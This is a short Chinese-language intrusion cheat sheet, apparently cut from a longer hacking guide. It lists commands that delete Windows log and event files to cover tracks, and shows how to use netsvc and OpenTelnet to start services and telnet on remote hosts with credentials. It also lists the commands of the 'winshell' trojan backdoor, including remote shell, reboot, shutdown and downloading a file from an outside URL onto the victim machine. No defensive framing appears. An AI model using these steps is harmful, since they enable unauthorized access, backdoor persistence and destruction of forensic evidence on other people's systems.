掃尾：

del C:/winnt/system32/logfiles/*.*

del C:/winnt/ssytem32/config/*.evt

del C:/winnt/system32/dtclog/*.*

del C:/winnt/system32/*.log

del C:/winnt/system32/*.txt

del C:/winnt/*.txt

del C:/winnt/*.log

一、netsvc.exe

下面的命令分別是列出主機上的服務項目、查尋和遠程啟動主機的“時間任務”服務：

netsvc /list //IP地址

netsvc schedule //IP地址 /query

netsvc //IP地址 schedule /start

二、OpenTelnet.exe

遠程啟動主機的Telnet服務，并綁定端口到7878，例如：

OpenTelnet //IP地址 用戶名 密碼 1 7878

然后就可以telnet到主機的7878端口，進入DOS方式下：

telnet IP地址 7878

三、winshell.exe

一個非常小的木馬（不到6K），telnet到主機的7878端口，輸入密碼winshell，當看到CMD后，可打下面的命令：

p Path （查看winshell主程序的路徑信息）

b reBoot （重新啟動機器）

d shutDown （關閉機器）

s Shell （執行后你就會看到可愛的“C:/”）

x eXit （退出本次登錄會話，此命令并不終止winshell的運行）

CMD http://.../srv.exe （通過http下載其他網站上的文件到運行winshell的機器上）